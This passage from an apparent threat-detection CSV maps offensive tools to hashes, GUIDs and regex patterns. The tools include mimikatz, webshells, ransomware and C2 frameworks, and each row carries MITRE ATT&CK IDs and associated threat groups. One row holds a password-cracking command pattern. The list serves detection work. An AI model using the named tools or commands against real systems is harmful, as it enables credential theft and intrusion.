Access","https://github.com/n1nj4sec/mimipy","1","0","#filehash","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","44545" "*fc3a3a947cac65214572d9cc2ca8e46401e28f7645cdefca61ef37b3ac95541e*",".{0,1000}fc3a3a947cac65214572d9cc2ca8e46401e28f7645cdefca61ef37b3ac95541e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44548" "*fc3b2d828651918334e05b57bf4f3c0990d545ac90c9aa062bf0042d70c2d55a*",".{0,1000}fc3b2d828651918334e05b57bf4f3c0990d545ac90c9aa062bf0042d70c2d55a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44549" "*fc4be26d47f3987e20a033c7284632b138b9b05779eef26458e234ace63d67bc*",".{0,1000}fc4be26d47f3987e20a033c7284632b138b9b05779eef26458e234ace63d67bc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44553" "*fc5011d77f51cfb7b2fc68ad652b1857670eccdf7327ae31ed1dd6d7c59b3ebb*",".{0,1000}fc5011d77f51cfb7b2fc68ad652b1857670eccdf7327ae31ed1dd6d7c59b3ebb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44554" "*fc5174e15f2021575ed3f96a79a316e92146e3869020d00220fb608497b422a0*",".{0,1000}fc5174e15f2021575ed3f96a79a316e92146e3869020d00220fb608497b422a0.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","44555" "*fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5*",".{0,1000}fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44556" "*fc53dedfa564864e96ebf7839232e0c3b998070479e5c25cb5351f4613e5dbef*",".{0,1000}fc53dedfa564864e96ebf7839232e0c3b998070479e5c25cb5351f4613e5dbef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44557" "*fc5559338c0ade4db54d8d511db5fe0962340177667dcacc071dcdcb956312f4*",".{0,1000}fc5559338c0ade4db54d8d511db5fe0962340177667dcacc071dcdcb956312f4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44558" "*FC5A1C5A-65B4-452A-AA4E-E6DCF1FA04FB*",".{0,1000}FC5A1C5A\-65B4\-452A\-AA4E\-E6DCF1FA04FB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - 
TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","44559" "*fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994*",".{0,1000}fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44561" "*fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3*",".{0,1000}fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44564" "*fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95*",".{0,1000}fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 
- FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44568" "*fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95*",".{0,1000}fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44569" 
"*FC7A5B008FCF3AD0C3535D4463C094D6833F11AB21DD39616B93A5518FB1C316*",".{0,1000}FC7A5B008FCF3AD0C3535D4463C094D6833F11AB21DD39616B93A5518FB1C316.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44570" "*fc828fc7ab13b12db0e3496a79c9af15f3f1391e5641551c0e0796ef6618bcf0*",".{0,1000}fc828fc7ab13b12db0e3496a79c9af15f3f1391e5641551c0e0796ef6618bcf0.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44573" "*fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c*",".{0,1000}fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44575" "*fc86f22cd93a4256749cc54df8e9d35efc8d6cd43e4bcc90c6ab212761975bb6*",".{0,1000}fc86f22cd93a4256749cc54df8e9d35efc8d6cd43e4bcc90c6ab212761975bb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44576" "*fc8a13a2f3a3a9d94a0b82c0a95fd6baced84cab1c0debfa7df2f3331dd3e31d*",".{0,1000}fc8a13a2f3a3a9d94a0b82c0a95fd6baced84cab1c0debfa7df2f3331dd3e31d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","44577" "*FC8F9DFC-3A81-4427-BFE5-DA11572EA8B5*",".{0,1000}FC8F9DFC\-3A81\-4427\-BFE5\-DA11572EA8B5.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44578" "*FC94F7F1F60026351DF16E3F9681E37BAA7491694DD7C5EA2CBE4B4F62602963*",".{0,1000}FC94F7F1F60026351DF16E3F9681E37BAA7491694DD7C5EA2CBE4B4F62602963.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","44580" "*fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a*",".{0,1000}fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44581" "*fc97c521e6bd003e20bd27d2de03f954e9f557167a015bcbe3322b60542fca4e*",".{0,1000}fc97c521e6bd003e20bd27d2de03f954e9f557167a015bcbe3322b60542fca4e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44582" "*fc9b3605369431a13dff28fc6bd80351199281ac59b536902db537132cb69ab5*",".{0,1000}fc9b3605369431a13dff28fc6bd80351199281ac59b536902db537132cb69ab5.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","44585" "*fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7*",".{0,1000}fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44586" "*fc9db4d8355ff19b09feb69b73f4c551a1e11158abaf795b16081b24f56b321a*",".{0,1000}fc9db4d8355ff19b09feb69b73f4c551a1e11158abaf795b16081b24f56b321a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44587" "*fcb2f607771f185531790722ac8e3a924146186bbd3d9e03a7a793545772bdf2*",".{0,1000}fcb2f607771f185531790722ac8e3a924146186bbd3d9e03a7a793545772bdf2.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#filehash","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","44592" "*fcb65ec936e24fb138b4d40c7223331de958b67c7e7a0a5177ec2d34ba342e6d*",".{0,1000}fcb65ec936e24fb138b4d40c7223331de958b67c7e7a0a5177ec2d34ba342e6d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44594" "*fcba4c2c8de3766ac07bbdb3933257cf8d374a956c2b9f95cdcc7cc6e12e8423*",".{0,1000}fcba4c2c8de3766ac07bbdb3933257cf8d374a956c2b9f95cdcc7cc6e12e8423.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44598" "*fcba85845f29fb731817fc013242bc410b18ea1e1cb3ff4ba52b599043f4e2d7*",".{0,1000}fcba85845f29fb731817fc013242bc410b18ea1e1cb3ff4ba52b599043f4e2d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44599" "*fcbcac521d37905835cbe924d2bca822513682a9cfa0d48945673e5b72d86709*",".{0,1000}fcbcac521d37905835cbe924d2bca822513682a9cfa0d48945673e5b72d86709.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","44600" "*fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac*",".{0,1000}fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44601" "*fcd4c0133b296c3590588114f203cd6506d60462590d115f942a3e123f472808*",".{0,1000}fcd4c0133b296c3590588114f203cd6506d60462590d115f942a3e123f472808.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","44604" "*FCD5E13D-1663-4226-8280-1C6A97933AB7*",".{0,1000}FCD5E13D\-1663\-4226\-8280\-1C6A97933AB7.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","#GUIDproject","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","44605" "*fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc*",".{0,1000}fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","#filehash","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","44606" "*FCE55626-886B-4D3B-B7AA-92CECDA91514*",".{0,1000}FCE55626\-886B\-4D3B\-B7AA\-92CECDA91514.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - 
T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44609" "*fce5693b62c0e3c49ba53a75354e6e9d99e44ba285faae08b25a1c220f471c7c*",".{0,1000}fce5693b62c0e3c49ba53a75354e6e9d99e44ba285faae08b25a1c220f471c7c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44610" "*FCE81BDA-ACAC-4892-969E-0414E765593B*",".{0,1000}FCE81BDA\-ACAC\-4892\-969E\-0414E765593B.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","#GUIDproject","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","44612" "*fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c*",".{0,1000}fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44613" "*fcf42661023c6669ed49ee885c76f3edd3b04dedd6e1489d06aa2595c5ae60cc*",".{0,1000}fcf42661023c6669ed49ee885c76f3edd3b04dedd6e1489d06aa2595c5ae60cc.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","44614" "*fcf4797042105ca349abdecb9d724dfcbb92300ff3d0881d90c311cb35fd5338*",".{0,1000}fcf4797042105ca349abdecb9d724dfcbb92300ff3d0881d90c311cb35fd5338.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44615" "*fcf965a77c9f97dcd7304a7abbe6af09c3e41855c888db2acebfc995365d1a28*",".{0,1000}fcf965a77c9f97dcd7304a7abbe6af09c3e41855c888db2acebfc995365d1a28.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44616" "*fcjam663uvgid2xbar24kab2vt4hjzsn6o77glh35jscuo567b2mnyqd.onion*",".{0,1000}fcjam663uvgid2xbar24kab2vt4hjzsn6o77glh35jscuo567b2mnyqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44618" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","44619" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","44620" "*fcrackzip -u -v -D -p *.zip*",".{0,1000}fcrackzip\s\-u\s\-v\s\-D\s\-p\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44621" 
